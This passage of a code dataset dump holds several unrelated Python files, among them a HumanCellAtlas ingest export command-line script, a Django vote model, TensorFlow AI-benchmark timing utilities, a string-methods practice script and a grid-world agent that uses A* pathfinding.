\r\n \r\n\r\n\"\"\"\r\nobj = AttendanceEmail()\r\nobj.schedule()\r\n#obj.send_message(HTML,Str_C_date)","repo_name":"ALPHABASE22/Project","sub_path":"Riverstone Finish/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22283789146","text":"#!/usr/bin/env python\nimport datetime\nimport logging\nimport os\nimport sys\nimport uuid\n\nfrom optparse import OptionParser\n\nfrom ingest.api.dssapi import DssApi\nfrom ingest.api.ingestapi import IngestApi\nfrom ingest.api.stagingapi import StagingApi\nfrom ingest.exporter.ingestexportservice import IngestExporter\nfrom ingest.exporter.staging import StagingService, StagingInfoRepository\nfrom ingest.utils.s2s_token_client import S2STokenClient\nfrom ingest.utils.token_manager import TokenManager\n\nif __name__ == '__main__':\n format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(format=format, stream=sys.stdout, level=logging.INFO)\n\n parser = OptionParser()\n parser.add_option(\"-b\", \"--bundle-uuid\",\n help=\"Bundle UUID (optional)\")\n parser.add_option(\"-v\", \"--bundle-version\",\n help=\"Bundle Version (optional)\")\n parser.add_option(\"-e\", \"--submission-uuid\",\n help=\"Submission envelope UUID for which to generate the bundle (Required)\")\n parser.add_option(\"-p\", \"--process-uuid\",\n help=\"Process UUID (Required)\")\n parser.add_option(\"-D\", \"--dry\", help=\"do a dry run without submitting to ingest\", action=\"store_true\",\n default=False)\n parser.add_option(\"-o\", \"--output\", dest=\"output\",\n help=\"Output directory where to dump json files submitted to ingest (Optional)\", metavar=\"FILE\",\n default=None)\n parser.add_option(\"-i\", \"--ingest\", help=\"the URL to the ingest API (Required)\")\n parser.add_option(\"-s\", \"--staging\", help=\"the URL to the staging API\")\n parser.add_option(\"-d\", \"--dss\", help=\"the URL to the datastore service\")\n parser.add_option(\"-l\", \"--log\", help=\"the logging level\", default='INFO')\n\n (options, args) = parser.parse_args()\n\n if not options.submission_uuid:\n print(\"You must supply a Submission Envelope UUID\")\n exit(2)\n\n if not options.process_uuid:\n print(\"You must supply a process UUID.\")\n exit(2)\n\n bundle_uuid = str(uuid.uuid4())\n bundle_version = datetime.datetime.utcnow().strftime(\"%Y-%m-%dT%H%M%S.%fZ\")\n\n if options.bundle_uuid:\n bundle_uuid = options.bundle_uuid\n\n if options.bundle_version:\n bundle_version = options.bundle_version\n\n dss_api = DssApi(url=options.dss)\n s2s_token_client = S2STokenClient()\n gcp_credentials_file = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS')\n s2s_token_client.setup_from_file(gcp_credentials_file)\n token_manager = TokenManager(token_client=s2s_token_client)\n ingest_api = IngestApi(token_manager=token_manager)\n staging_api = StagingApi(url=options.staging)\n staging_info_repo = StagingInfoRepository(ingest_client=ingest_api)\n staging_service = StagingService(staging_client=staging_api, staging_info_repository=staging_info_repo)\n exporter = IngestExporter(staging_service=staging_service, ingest_api=ingest_api, dss_api=dss_api)\n exporter.export_bundle(bundle_uuid=bundle_uuid,\n bundle_version=bundle_version,\n submission_uuid=options.submission_uuid,\n 
process_uuid=options.process_uuid)\n","repo_name":"HumanCellAtlas/ingest-client","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"2707817177","text":"from django.db import models\nfrom dwalls.models.wall import Wall\nfrom dwalls.models.account import Account\n\nclass Vote(models.Model):\n    VOTE_TYPE = (\n        ('L', 'LIKE'),\n        ('D', 'DISLIKE')\n    )\n    account = models.ForeignKey(\n        Account, related_name='vote', blank=True, null=True)\n    wall = models.ForeignKey(\n        Wall, related_name='vote')\n    vote = models.CharField(\n        max_length=1,\n        choices=VOTE_TYPE)\n\n    date = models.DateTimeField(auto_now_add=True, blank=True)\n","repo_name":"Ketzalkotal/dwalls","sub_path":"dwalls_channels/dwalls/models/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14209205289","text":"# -*- coding: utf-8 -*-\r\n# Copyright 2019-2020 by Andrey Ignatov. All Rights Reserved.\r\n\r\nimport sys\r\nimport os\r\nfrom os import path\r\nimport subprocess\r\nimport platform\r\nimport cpuinfo\r\nimport time\r\nimport multiprocessing\r\nimport logging\r\n\r\nfrom psutil import virtual_memory\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.python.client import device_lib\r\nfrom pkg_resources import parse_version\r\nfrom PIL import Image\r\n\r\nfrom ai_benchmark.update_utils import update_info\r\nfrom ai_benchmark.config import TestConstructor\r\nfrom ai_benchmark.models import *\r\n\r\nMAX_TEST_DURATION = 100\r\n\r\nlogger = logging.getLogger('ai_benchmark')\r\n\r\n\r\nclass BenchmarkResults:\r\n    def __init__(self):\r\n        self.results_inference_norm = []\r\n        self.results_training_norm = []\r\n\r\n        self.results_inference = []\r\n        self.results_training = []\r\n\r\n        self.inference_score = 0\r\n        self.training_score = 0\r\n\r\n        self.ai_score = 0\r\n\r\n\r\nclass Result:\r\n    def __init__(self, mean, std):\r\n        self.mean = mean\r\n        self.std = std\r\n\r\n\r\nclass PublicResults:\r\n    def __init__(self):\r\n        self.test_results = {}\r\n        self.ai_score = None\r\n\r\n        self.inference_score = None\r\n        self.training_score = None\r\n\r\n\r\nclass TestInfo:\r\n    def __init__(self, _type, precision, use_cpu, verbose, cpu_cores, inter_threads, intra_threads):\r\n        from ai_benchmark import __version__\r\n        self._type = _type\r\n        self.version = __version__\r\n        self.py_version = sys.version\r\n        self.tf_version = get_tf_version()\r\n        self.tf_ver_2 = parse_version(self.tf_version) > parse_version('1.99')\r\n        self.platform_info = get_platform_info()\r\n        self.cpu_model = get_cpu_model()\r\n        self.cpu_cores = cpu_cores or get_num_cpu_cores()\r\n        self.inter_threads = inter_threads or self.cpu_cores * 2\r\n        self.intra_threads = intra_threads or self.cpu_cores * 2\r\n        self.cpu_ram = get_cpu_ram()\r\n        self.is_cpu_build = is_cpu_build()\r\n        self.is_cpu_inference = (is_cpu_build() or use_cpu)\r\n        self.gpu_devices = get_gpu_models()\r\n        self.cuda_version, self.cuda_build = get_cuda_info()\r\n        self.precision = precision\r\n        self.verbose_level = verbose\r\n        self.results = None\r\n        self.path = path.dirname(__file__)\r\n\r\n\r\ndef get_time_seconds():\r\n    return int(time.time())\r\n\r\n\r\ndef get_time_ms():\r\n    return int(round(time.time() * 1000))\r\n\r\n\r\ndef resize_image(image, dimensions):\r\n\r\n    image = np.asarray(image)\r\n\r\n    height = image.shape[0]\r\n    width = image.shape[1]\r\n
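\r\n    # Worked example of the center-crop-then-resize logic below (illustrative\r\n    # numbers only): for a 600x1000 (HxW) input and dimensions = [224, 224],\r\n    # the target aspect ratio is 224/224 = 1.0 while the image ratio is\r\n    # 1000/600, so the width is cropped to 600*1.0 = 600 px with an offset of\r\n    # (1000-600)/2 = 200 px before the final resize to 224x224.\r\n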
aspect_ratio_image = float(width) / height\r\n    aspect_ratio_target = float(dimensions[1]) / dimensions[0]\r\n\r\n    if aspect_ratio_target == aspect_ratio_image:\r\n        image = Image.fromarray(image).resize((dimensions[1], dimensions[0]))\r\n\r\n    elif aspect_ratio_image < aspect_ratio_target:\r\n        new_height = int(float(width) / aspect_ratio_target)\r\n        offset = int((height - new_height) / 2)\r\n        image = image[offset:offset + new_height, :, :]\r\n        image = Image.fromarray(image).resize((dimensions[1], dimensions[0]))\r\n\r\n    else:\r\n        new_width = int(float(height) * aspect_ratio_target)\r\n        offset = int((width - new_width) / 2)\r\n        image = image[:, offset:offset + new_width, :]\r\n        image = Image.fromarray(image).resize((dimensions[1], dimensions[0]))\r\n\r\n    return image\r\n\r\n\r\ndef load_data(test_type, dimensions):\r\n\r\n    data = None\r\n    if test_type == \"classification\":\r\n\r\n        data = np.zeros(dimensions)\r\n        for j in range(dimensions[0]):\r\n\r\n            image = Image.open(path.join(path.dirname(__file__), \"data/classification/\" + str(j) + \".jpg\"))\r\n            image = resize_image(image, [dimensions[1], dimensions[2]])\r\n            data[j] = image\r\n\r\n    if test_type == \"enhancement\":\r\n\r\n        data = np.zeros(dimensions)\r\n        for j in range(dimensions[0]):\r\n            image = Image.open(path.join(path.dirname(__file__), \"data/enhancement/\" + str(j) + \".jpg\"))\r\n            image = resize_image(image, [dimensions[1], dimensions[2]])\r\n            data[j] = image\r\n\r\n    if test_type == \"segmentation\":\r\n\r\n        data = np.zeros(dimensions)\r\n        for j in range(dimensions[0]):\r\n            image = Image.open(path.join(path.dirname(__file__), \"data/segmentation/\" + str(j) + \".jpg\"))\r\n            image = resize_image(image, [dimensions[1], dimensions[2]])\r\n            data[j] = image\r\n\r\n    if test_type == \"nlp\":\r\n        data = np.random.uniform(-4, 4, (dimensions[0], dimensions[1], dimensions[2]))\r\n\r\n    if test_type == \"nlp-text\":\r\n        data = \"This is a story of how a Baggins had an adventure, \" \\\r\n               \"and found himself doing and saying things altogether unexpected.\"\r\n\r\n    return data\r\n\r\n\r\ndef load_targets(test_type, dimensions):\r\n\r\n    data = None\r\n    if test_type == \"classification\" or test_type == \"nlp\":\r\n\r\n        data = np.zeros(dimensions)\r\n        for j in range(dimensions[0]):\r\n            data[j, np.random.randint(dimensions[1])] = 1\r\n\r\n    if test_type == \"enhancement\":\r\n\r\n        data = np.zeros(dimensions)\r\n        for j in range(dimensions[0]):\r\n            image = Image.open(path.join(path.dirname(__file__), \"data/enhancement/\" + str(j) + \".jpg\"))\r\n            image = resize_image(image, [dimensions[1], dimensions[2]])\r\n            data[j] = image\r\n\r\n    if test_type == \"segmentation\":\r\n\r\n        data = np.zeros(dimensions)\r\n        for j in range(dimensions[0]):\r\n            image = Image.open(path.join(path.dirname(__file__), \"data/segmentation/\" + str(j) + \"_segmented.jpg\"))\r\n            image = resize_image(image, [dimensions[1], dimensions[2]])\r\n            data[j] = image\r\n\r\n    return data\r\n\r\n\r\ndef construct_optimizer(sess, output_, target_, loss_function, optimizer, learning_rate, tf_ver_2):\r\n\r\n    if loss_function == \"MSE\":\r\n        loss_ = 2 * tf.nn.l2_loss(output_ - target_)\r\n\r\n    if optimizer == \"Adam\":\r\n        if tf_ver_2:\r\n            optimizer = 
tf.compat.v1.train.AdamOptimizer(learning_rate)\r\n else:\r\n optimizer = tf.train.AdamOptimizer(learning_rate)\r\n\r\n train_step = optimizer.minimize(loss_)\r\n\r\n if tf_ver_2:\r\n sess.run(tf.compat.v1.variables_initializer(optimizer.variables()))\r\n else:\r\n sess.run(tf.variables_initializer(optimizer.variables()))\r\n\r\n return train_step\r\n\r\n\r\ndef get_model_src(test, testInfo, session):\r\n\r\n train_vars = None\r\n\r\n if testInfo.tf_ver_2 and test.use_src:\r\n\r\n # Bypassing TensorFlow 2.0+ RNN Bugs\r\n\r\n if test.model == \"LSTM-Sentiment\":\r\n input_ = tf.compat.v1.placeholder(tf.float32, [None, 1024, 300], name=\"input\")\r\n output_ = LSTM_Sentiment(input_)\r\n\r\n if test.model == \"Pixel-RNN\":\r\n input_ = tf.compat.v1.placeholder(tf.float32, [None, 64, 64, 3], name=\"input\")\r\n output_ = PixelRNN(input_)\r\n\r\n target_ = tf.compat.v1.placeholder(tf.float32, test.training[0].get_output_dims())\r\n\r\n train_step_ = construct_optimizer(session, output_, target_, test.training[0].loss_function,\r\n test.training[0].optimizer, test.training[0].learning_rate, testInfo.tf_ver_2)\r\n\r\n train_vars = [target_, train_step_]\r\n\r\n else:\r\n\r\n if testInfo.tf_ver_2:\r\n tf.compat.v1.train.import_meta_graph(test.model_src, clear_devices=True)\r\n g = tf.compat.v1.get_default_graph()\r\n else:\r\n tf.train.import_meta_graph(test.model_src, clear_devices=True)\r\n g = tf.get_default_graph()\r\n\r\n input_ = g.get_tensor_by_name('input:0')\r\n output_ = g.get_tensor_by_name('output:0')\r\n\r\n return input_, output_, train_vars\r\n\r\n\r\ndef compute_stats(results):\r\n if len(results) > 1:\r\n results = results[1:]\r\n return np.mean(results), np.std(results)\r\n\r\n\r\ndef print_test_results(prefix, batch_size, dimensions, mean, std):\r\n if std > 1 and mean > 100:\r\n prt_str = \"%s | batch=%d, size=%dx%d: %.d ± %.d ms\" % (\r\n prefix, batch_size, dimensions[1], dimensions[2], round(mean), round(std))\r\n else:\r\n prt_str = \"%s | batch=%d, size=%dx%d: %.1f ± %.1f ms\" % (\r\n prefix, batch_size, dimensions[1], dimensions[2], mean, std)\r\n logger.info(prt_str)\r\n\r\n\r\ndef print_intro():\r\n import ai_benchmark\r\n logger.info(\">> AI-Benchmark - %s\", ai_benchmark.__version__)\r\n logger.info(\">> Let the AI Games begin\")\r\n\r\n\r\ndef print_test_info(testInfo):\r\n logger.info(\"* TF Version: %s\", testInfo.tf_version)\r\n logger.info(\"* Platform: %s\", testInfo.platform_info)\r\n logger.info(\"* CPU: %s\", testInfo.cpu_model)\r\n logger.info(\"* CPU RAM: %s GB\", testInfo.cpu_ram)\r\n\r\n if not testInfo.is_cpu_inference:\r\n\r\n for gpu_id, gpu_info in enumerate(testInfo.gpu_devices):\r\n logger.info(\"* GPU/%s: %s\", gpu_id, gpu_info[0])\r\n logger.info(\"* GPU RAM: %s GB\", gpu_info[1])\r\n\r\n logger.info(\"* CUDA Version: %s\", testInfo.cuda_version)\r\n logger.info(\"* CUDA Build: %s\", testInfo.cuda_build)\r\n\r\n update_info(\"launch\", testInfo)\r\n logger.warning(\"The benchmark is running...\")\r\n logger.warning(\"The tests might take up to 20 minutes\")\r\n logger.warning(\"Please don't interrupt the script\")\r\n\r\n\r\ndef get_tf_version():\r\n try:\r\n return tf.__version__\r\n except:\r\n pass\r\n return \"N/A\"\r\n\r\n\r\ndef get_platform_info():\r\n platform_info = \"N/A\"\r\n try:\r\n return platform.platform()\r\n except:\r\n pass\r\n return platform_info\r\n\r\n\r\ndef get_cpu_model():\r\n try:\r\n return cpuinfo.get_cpu_info()['brand']\r\n except:\r\n return \"N/A\"\r\n\r\n\r\ndef get_num_cpu_cores():\r\n try:\r\n return 
multiprocessing.cpu_count()\r\n except:\r\n return -1\r\n\r\n\r\ndef get_cpu_ram():\r\n try:\r\n return str(round(virtual_memory().total / (1024. ** 3)))\r\n except:\r\n return \"N/A\"\r\n\r\n\r\ndef is_cpu_build():\r\n is_cpu_build = True\r\n try:\r\n if tf.test.gpu_device_name():\r\n is_cpu_build = False\r\n except:\r\n pass\r\n return is_cpu_build\r\n\r\n\r\ndef get_gpu_models():\r\n gpu_models = [[\"N/A\", \"N/A\"]]\r\n gpu_id = 0\r\n try:\r\n tf_gpus = str(device_lib.list_local_devices())\r\n while tf_gpus.find('device_type: \"GPU\"') != -1 or tf_gpus.find('device_type: \"XLA_GPU\"') != -1:\r\n\r\n device_type_gpu = tf_gpus.find('device_type: \"GPU\"')\r\n if device_type_gpu == -1:\r\n device_type_gpu = tf_gpus.find('device_type: \"XLA_GPU\"')\r\n\r\n tf_gpus = tf_gpus[device_type_gpu:]\r\n tf_gpus = tf_gpus[tf_gpus.find('memory_limit:'):]\r\n gpu_ram = tf_gpus[:tf_gpus.find(\"\\n\")]\r\n\r\n gpu_ram = int(gpu_ram.split(\" \")[1]) / (1024.**3)\r\n gpu_ram = str(round(gpu_ram * 10) / 10)\r\n\r\n tf_gpus = tf_gpus[tf_gpus.find('physical_device_desc:'):]\r\n tf_gpus = tf_gpus[tf_gpus.find('name:'):]\r\n gpu_model = tf_gpus[6:tf_gpus.find(',')]\r\n\r\n if gpu_id == 0:\r\n gpu_models = [[gpu_model, gpu_ram]]\r\n else:\r\n gpu_models.append([gpu_model, gpu_ram])\r\n\r\n gpu_id += 1\r\n except:\r\n pass\r\n return gpu_models\r\n\r\n\r\ndef get_cuda_info():\r\n cuda_version = \"N/A\"\r\n cuda_build = \"N/A\"\r\n try:\r\n cuda_info = str(subprocess.check_output([\"nvcc\", \"--version\"]))\r\n cuda_info = cuda_info[cuda_info.find(\"release\"):]\r\n cuda_version = cuda_info[cuda_info.find(\" \") + 1:cuda_info.find(\",\")]\r\n cuda_build = cuda_info[cuda_info.find(\",\") + 2:cuda_info.find(\"\\\\\")]\r\n except:\r\n pass\r\n return cuda_version, cuda_build\r\n\r\n\r\ndef print_scores(testInfo, public_results):\r\n\r\n c_inference = 10000\r\n c_training = 10000\r\n\r\n if testInfo._type == \"full\":\r\n\r\n inference_score = geometrical_mean(testInfo.results.results_inference_norm)\r\n if np.isnan(inference_score):\r\n inference_score = 0\r\n training_score = geometrical_mean(testInfo.results.results_training_norm)\r\n if np.isnan(training_score):\r\n training_score = 0\r\n\r\n testInfo.results.inference_score = int(inference_score * c_inference)\r\n testInfo.results.training_score = int(training_score * c_training)\r\n\r\n public_results.inference_score = testInfo.results.inference_score\r\n public_results.training_score = testInfo.results.training_score\r\n\r\n testInfo.results.ai_score = testInfo.results.inference_score + testInfo.results.training_score\r\n public_results.ai_score = testInfo.results.ai_score\r\n\r\n update_info(\"scores\", testInfo)\r\n\r\n logger.info(\"Device Inference Score: %s\", testInfo.results.inference_score)\r\n logger.info(\"Device Training Score: %s\", testInfo.results.training_score)\r\n logger.info(\"Device AI Score: %s\", testInfo.results.ai_score)\r\n logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n if testInfo._type == \"inference\":\r\n\r\n inference_score = geometrical_mean(testInfo.results.results_inference_norm)\r\n testInfo.results.inference_score = int(inference_score * c_inference)\r\n\r\n public_results.inference_score = testInfo.results.inference_score\r\n\r\n update_info(\"scores\", testInfo)\r\n\r\n logger.info(\"Device Inference Score: %s\", testInfo.results.inference_score)\r\n logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n if 
testInfo._type == \"training\":\r\n\r\n        training_score = geometrical_mean(testInfo.results.results_training_norm)\r\n        testInfo.results.training_score = int(training_score * c_training)\r\n\r\n        public_results.training_score = testInfo.results.training_score\r\n\r\n        update_info(\"scores\", testInfo)\r\n\r\n        logger.info(\"Device Training Score: %s\", testInfo.results.training_score)\r\n        logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n    if testInfo._type == \"micro\":\r\n\r\n        inference_score = geometrical_mean(testInfo.results.results_inference_norm)\r\n        testInfo.results.inference_score = int(inference_score * c_inference)\r\n\r\n        public_results.inference_score = testInfo.results.inference_score\r\n\r\n        update_info(\"scores\", testInfo)\r\n\r\n        logger.info(\"Device Inference Score: %s\", testInfo.results.inference_score)\r\n        logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n    return public_results\r\n\r\n\r\ndef geometrical_mean(results):\r\n    results = np.asarray(results)\r\n    try:\r\n        return results.prod() ** (1.0 / len(results))\r\n    except ZeroDivisionError:\r\n        return np.nan\r\n\r\n\r\ndef run_tests(\r\n        training,\r\n        inference,\r\n        micro,\r\n        verbose,\r\n        use_cpu,\r\n        precision,\r\n        _type,\r\n        start_dir,\r\n        test_ids=None,\r\n        cpu_cores=None,\r\n        inter_threads=None,\r\n        intra_threads=None,\r\n    ):\r\n    testInfo = TestInfo(_type, precision, use_cpu, verbose, cpu_cores, inter_threads, intra_threads)\r\n    testInfo.full_suite = (\r\n        test_ids is None or\r\n        len(test_ids) == len(TestConstructor.BENCHMARK_TESTS)\r\n    )\r\n\r\n    print_test_info(testInfo)\r\n    time.sleep(1)\r\n\r\n    benchmark_tests = TestConstructor().get_tests(test_ids)\r\n    benchmark_results = BenchmarkResults()\r\n    public_results = PublicResults()\r\n    os.chdir(path.dirname(__file__))\r\n\r\n    iter_multiplier = {\r\n        \"dry\": 0,\r\n        \"normal\": 1,\r\n        \"high\": 10,\r\n    }.get(precision, 1)\r\n\r\n    ConfigProto = tf.compat.v1.ConfigProto if testInfo.tf_ver_2 else tf.ConfigProto\r\n    if use_cpu:\r\n        config = ConfigProto(\r\n            device_count={'GPU': 0, 'CPU': testInfo.cpu_cores},\r\n            inter_op_parallelism_threads=testInfo.inter_threads,\r\n            intra_op_parallelism_threads=testInfo.intra_threads,\r\n        )\r\n    else:\r\n        config = None\r\n\r\n    for test in benchmark_tests:\r\n\r\n        if not (micro and len(test.micro) == 0):\r\n            logger.info(\"\\n%s/%s. 
%s\\n\", test.id, len(benchmark_tests), test.model)\r\n sub_id = 1\r\n\r\n tf.compat.v1.reset_default_graph() if testInfo.tf_ver_2 else tf.reset_default_graph()\r\n session = tf.compat.v1.Session(config=config) if testInfo.tf_ver_2 else tf.Session(config=config)\r\n\r\n with tf.Graph().as_default(), session as sess:\r\n\r\n input_, output_, train_vars_ = get_model_src(test, testInfo, sess)\r\n\r\n if testInfo.tf_ver_2:\r\n tf.compat.v1.global_variables_initializer().run()\r\n if test.type == \"nlp-text\":\r\n sess.run(tf.compat.v1.tables_initializer())\r\n else:\r\n tf.global_variables_initializer().run()\r\n if test.type == \"nlp-text\":\r\n sess.run(tf.tables_initializer())\r\n\r\n if inference or micro:\r\n\r\n for subTest in (test.inference if inference else test.micro):\r\n\r\n time_test_started = get_time_seconds()\r\n inference_times = []\r\n\r\n for i in range(subTest.iterations * iter_multiplier):\r\n\r\n if get_time_seconds() - time_test_started < subTest.max_duration \\\r\n or (i < subTest.min_passes and get_time_seconds() - time_test_started < MAX_TEST_DURATION) \\\r\n or precision == \"high\":\r\n\r\n data = load_data(test.type, subTest.get_input_dims())\r\n time_iter_started = get_time_ms()\r\n sess.run(output_, feed_dict={input_: data})\r\n inference_time = get_time_ms() - time_iter_started\r\n inference_times.append(inference_time)\r\n\r\n logger.debug(\"Inference Time: %s ms\", inference_time)\r\n\r\n time_mean, time_std = compute_stats(inference_times)\r\n\r\n public_id = \"%d.%d\" % (test.id, sub_id)\r\n public_results.test_results[public_id] = Result(time_mean, time_std)\r\n\r\n benchmark_results.results_inference.append(time_mean)\r\n benchmark_results.results_inference_norm.append(float(subTest.ref_time) / time_mean)\r\n\r\n prefix = \"%d.%d - inference\" % (test.id, sub_id)\r\n print_test_results(prefix, subTest.batch_size, subTest.get_input_dims(), time_mean, time_std)\r\n sub_id += 1\r\n\r\n if training:\r\n\r\n for subTest in test.training:\r\n\r\n if train_vars_ is None:\r\n\r\n if testInfo.tf_ver_2:\r\n target_ = tf.compat.v1.placeholder(tf.float32, subTest.get_output_dims())\r\n else:\r\n target_ = tf.placeholder(tf.float32, subTest.get_output_dims())\r\n\r\n train_step = construct_optimizer(sess, output_, target_, subTest.loss_function,\r\n subTest.optimizer, subTest.learning_rate, testInfo.tf_ver_2)\r\n\r\n else:\r\n\r\n target_ = train_vars_[0]\r\n train_step = train_vars_[1]\r\n\r\n time_test_started = get_time_seconds()\r\n training_times = []\r\n\r\n for i in range(subTest.iterations * iter_multiplier):\r\n\r\n if get_time_seconds() - time_test_started < subTest.max_duration \\\r\n or (i < subTest.min_passes and get_time_seconds() - time_test_started < MAX_TEST_DURATION) \\\r\n or precision == \"high\":\r\n\r\n data = load_data(test.type, subTest.get_input_dims())\r\n target = load_targets(test.type, subTest.get_output_dims())\r\n\r\n time_iter_started = get_time_ms()\r\n sess.run(train_step, feed_dict={input_: data, target_: target})\r\n training_time = get_time_ms() - time_iter_started\r\n training_times.append(training_time)\r\n\r\n logger.debug(\"Training Time: %s ms\", training_time)\r\n\r\n time_mean, time_std = compute_stats(training_times)\r\n\r\n public_id = \"%d.%d\" % (test.id, sub_id)\r\n public_results.test_results[public_id] = Result(time_mean, time_std)\r\n\r\n benchmark_results.results_training.append(time_mean)\r\n benchmark_results.results_training_norm.append(float(subTest.ref_time) / time_mean)\r\n\r\n prefix = \"%d.%d - training \" % 
(test.id, sub_id)\r\n print_test_results(prefix, subTest.batch_size, subTest.get_input_dims(), time_mean, time_std)\r\n sub_id += 1\r\n\r\n sess.close()\r\n\r\n testInfo.results = benchmark_results\r\n public_results = print_scores(testInfo, public_results)\r\n\r\n os.chdir(start_dir)\r\n return testInfo, public_results\r\n","repo_name":"cloudmercato/ai-benchmark","sub_path":"ai_benchmark/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21502,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"36392664102","text":"__author__ = 'honeymathew'\n\nx = \"hai honeyss\\n\"\n# print(x[-1])\n# print(len(\"honey\"))\n#print(x[4])\n\n# s1 = \"hello\"\n# s2 = \"honey\"\n# print(s1+ \" \"+ s2)\n\n#print(x*2)\n#print(\"\\012\")\n#print('a\\n\\tb')\n\nx = \"split string using the method called split\"\nprint(x.split())\n\n#print(\"::\".join([\"join\", \"using\", \"the\", \"method\", \"called\", \"join\"]))\n\n#x = 'mississippi'\n#print(x.split('ss'))\n# print(x.find('s'))\n# print(x.find('g'))\n#print(x.replace('ss', '++++'))\n\n# x = \"123\"\n# print(x.isalpha())\n\n\n#print(\"{0} is the {1} of {3} \".format(\"amo\", \"food\", \"god\"))","repo_name":"honeymathew/PythonTraining","sub_path":"strinhs.py","file_name":"strinhs.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3706912671","text":"import numpy as np\nimport heapq\nimport os \nimport time\nfrom termcolor import colored\n\nclass GridEnvironment:\n def __init__(self):\n self.size = 6\n self.reset()\n\n def reset(self):\n self.agent_pos = [0, 0]\n self.resource_pos = np.random.choice(36, 15, replace=False)\n self.grid = np.zeros((self.size, self.size))\n np.put(self.grid, self.resource_pos, 1)\n self.resource_count = 0\n self.rewards = 0\n self.steps = 0\n return self.get_state()\n\n def get_state(self):\n state = {'grid': self.grid, 'agent_pos': self.agent_pos, 'resource_count': self.resource_count}\n return state\n\n def step(self, action):\n if action == 'up':\n self.agent_pos[0] = max(0, self.agent_pos[0]-1)\n self.rewards -= 1\n elif action == 'down':\n self.agent_pos[0] = min(self.size-1, self.agent_pos[0]+1)\n self.rewards -= 1\n elif action == 'left':\n self.agent_pos[1] = max(0, self.agent_pos[1]-1)\n self.rewards -= 1\n elif action == 'right':\n self.agent_pos[1] = min(self.size-1, self.agent_pos[1]+1)\n self.rewards -= 1\n elif action == 'collect':\n if self.grid[self.agent_pos[0], self.agent_pos[1]] == 1:\n self.grid[self.agent_pos[0], self.agent_pos[1]] = 0\n self.resource_count += 1\n self.rewards += 16\n elif action == 'build':\n if self.grid[self.agent_pos[0], self.agent_pos[1]] == 0 and self.resource_count >= 3:\n self.grid[self.agent_pos[0], self.agent_pos[1]] = 2\n self.resource_count -= 3\n self.rewards += 60\n\n self.steps += 1\n done = self.is_episode_done()\n return self.get_state(), done\n\n def is_episode_done(self):\n # End the episode after a maximum number of steps\n if self.steps >= self.size**2 * 5 or (np.sum(self.grid == 1) == 0 and self.resource_count == 0):\n return True\n\n \n\n def a_star(self, start, goal, grid):\n def heuristic(a, b):\n return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2\n\n neighbors = [(0,1), (0,-1), (1,0), (-1,0)]\n close_set = set()\n came_from = {}\n gscore = {start: 0}\n fscore = {start: heuristic(start, goal)}\n oheap = []\n\n heapq.heappush(oheap, (fscore[start], start))\n\n while oheap:\n current = 
heapq.heappop(oheap)[1]\n\n if current == goal:\n data = []\n while current in came_from:\n data.append(current)\n current = came_from[current]\n return data\n\n close_set.add(current)\n for i, j in neighbors:\n neighbor = current[0] + i, current[1] + j\n tentative_g_score = gscore[current] + heuristic(current, neighbor)\n if 0 <= neighbor[0] < grid.shape[0]:\n if 0 <= neighbor[1] < grid.shape[1]:\n if grid[neighbor[0]][neighbor[1]] == 2:\n continue\n else:\n continue\n else:\n continue\n\n if neighbor in close_set and tentative_g_score >= gscore.get(neighbor, 0):\n continue\n\n if tentative_g_score < gscore.get(neighbor, 0) or neighbor not in [i[1] for i in oheap]:\n came_from[neighbor] = current\n gscore[neighbor] = tentative_g_score\n fscore[neighbor] = tentative_g_score + heuristic(neighbor, goal)\n heapq.heappush(oheap, (fscore[neighbor], neighbor))\n\n\ndef print_env(state):\n grid = np.copy(state['grid']) \n grid[tuple(state['agent_pos'])] = 9 \n\n for i in range(grid.shape[0]):\n for j in range(grid.shape[1]):\n if grid[i, j] == 1:\n print(colored(\"1\", 'yellow'), end=' ') \n elif grid[i, j] == 9:\n print(colored(\"A\", 'red'), end=' ') \n elif grid[i, j] == 2:\n print(colored(\"2\", 'blue'), end=' ') \n else:\n print(colored(\"0\", 'grey'), end=' ')\n print()\n print(f\"{action}\")\n print(f\"{env.rewards}\")\n print()\n\nclass SimpleAgent:\n def __init__(self, env):\n self.env = env\n\n def act(self, state):\n # Check if agent is standing on a resource and collect it\n if state['grid'][state['agent_pos'][0]][state['agent_pos'][1]] == 1:\n return 'collect'\n\n # Check if agent has at least 3 resources and is standing on an empty square\n if state['resource_count'] >= 3 and state['grid'][state['agent_pos'][0]][state['agent_pos'][1]] == 0:\n return 'build'\n\n # Determine nearest resource\n resource_pos = np.argwhere(state['grid'] == 1)\n if len(resource_pos) > 0:\n distances = np.linalg.norm(resource_pos - state['agent_pos'], axis=1)\n nearest_resource = resource_pos[np.argmin(distances)].tolist()\n path = self.env.a_star(tuple(state['agent_pos']), tuple(nearest_resource), state['grid'])\n if path is not None and len(path) > 0:\n path = list(reversed(path)) # Reverse the path\n next_pos = path[1] if len(path) > 1 else path[0] # Get the next position\n return 'right' if next_pos[1] > state['agent_pos'][1] else 'left' if next_pos[1] < state['agent_pos'][1] else 'down' if next_pos[0] > state['agent_pos'][0] else 'up'\n\n # Determine nearest empty square if no resources left\n empty_pos = np.argwhere(state['grid'] == 0)\n if len(empty_pos) > 0:\n distances = np.linalg.norm(empty_pos - state['agent_pos'], axis=1)\n 